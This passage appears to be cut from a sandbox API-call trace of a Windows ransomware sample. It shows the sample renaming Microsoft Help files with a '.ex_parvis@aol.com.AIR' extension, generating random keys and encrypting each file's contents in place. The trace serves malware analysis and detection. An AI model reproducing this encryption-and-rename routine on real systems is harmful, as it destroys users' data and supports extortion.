lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.362] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.362] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.362] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.362] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.362] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.362] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 57 [0161.363] GetProcessHeap () returned 0x2e0000 [0161.363] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x319d30 [0161.363] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" [0161.363] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.363] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.365] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.365] GetProcessHeap () returned 0x2e0000 [0161.365] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.365] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=338) returned 1 [0161.365] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x152 [0161.365] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.365] GetProcessHeap () returned 0x2e0000 [0161.365] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.365] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.365] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.366] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.366] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.366] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.366] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.366] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.367] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.367] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.367] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.368] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 53 [0161.368] GetProcessHeap () returned 0x2e0000 [0161.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd0) returned 0x3470a0 [0161.368] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" [0161.368] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.368] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.370] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.370] GetProcessHeap () returned 0x2e0000 [0161.370] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.370] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=314) returned 1 [0161.370] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x13a [0161.370] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.370] GetProcessHeap () returned 0x2e0000 [0161.370] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.370] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.370] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.371] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.371] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.372] ReadFile (in: hFile=0x4d8, lpBuffer=0x334020, nNumberOfBytesToRead=0x13a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x334020*, lpNumberOfBytesRead=0x2acf9c8*=0x13a, lpOverlapped=0x0) returned 1 [0161.372] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-314, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.372] WriteFile (in: hFile=0x4d8, lpBuffer=0x333d90*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x333d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x13a, lpOverlapped=0x0) returned 1 [0161.372] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.372] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.372] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.373] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 56 [0161.373] GetProcessHeap () returned 0x2e0000 [0161.373] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd6) returned 0x319d30 [0161.373] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" [0161.373] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.373] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.375] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.375] GetProcessHeap () returned 0x2e0000 [0161.376] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.376] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=332) returned 1 [0161.376] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14c [0161.376] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.376] GetProcessHeap () returned 0x2e0000 [0161.376] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.376] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.376] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.377] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.377] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.377] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x14c, lpOverlapped=0x0) returned 1 [0161.377] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-332, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.377] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x14c, lpOverlapped=0x0) returned 1 [0161.380] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.380] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.380] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.381] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 59 [0161.381] GetProcessHeap () returned 0x2e0000 [0161.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x3ac428 [0161.381] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" [0161.381] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.381] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.385] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.385] GetProcessHeap () returned 0x2e0000 [0161.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.385] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=350) returned 1 [0161.385] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15e [0161.385] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.385] GetProcessHeap () returned 0x2e0000 [0161.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.385] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.385] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.386] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.386] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.386] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.386] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.387] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.387] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.387] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.387] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.387] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 55 [0161.387] GetProcessHeap () returned 0x2e0000 [0161.387] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0161.387] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" [0161.387] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.387] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.389] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.390] GetProcessHeap () returned 0x2e0000 [0161.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.390] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=326) returned 1 [0161.390] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x146 [0161.390] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.390] GetProcessHeap () returned 0x2e0000 [0161.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.390] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.390] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.392] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.392] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.392] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.392] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.392] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.392] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.392] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.392] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.392] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 55 [0161.392] GetProcessHeap () returned 0x2e0000 [0161.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0161.392] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0161.393] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.393] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), 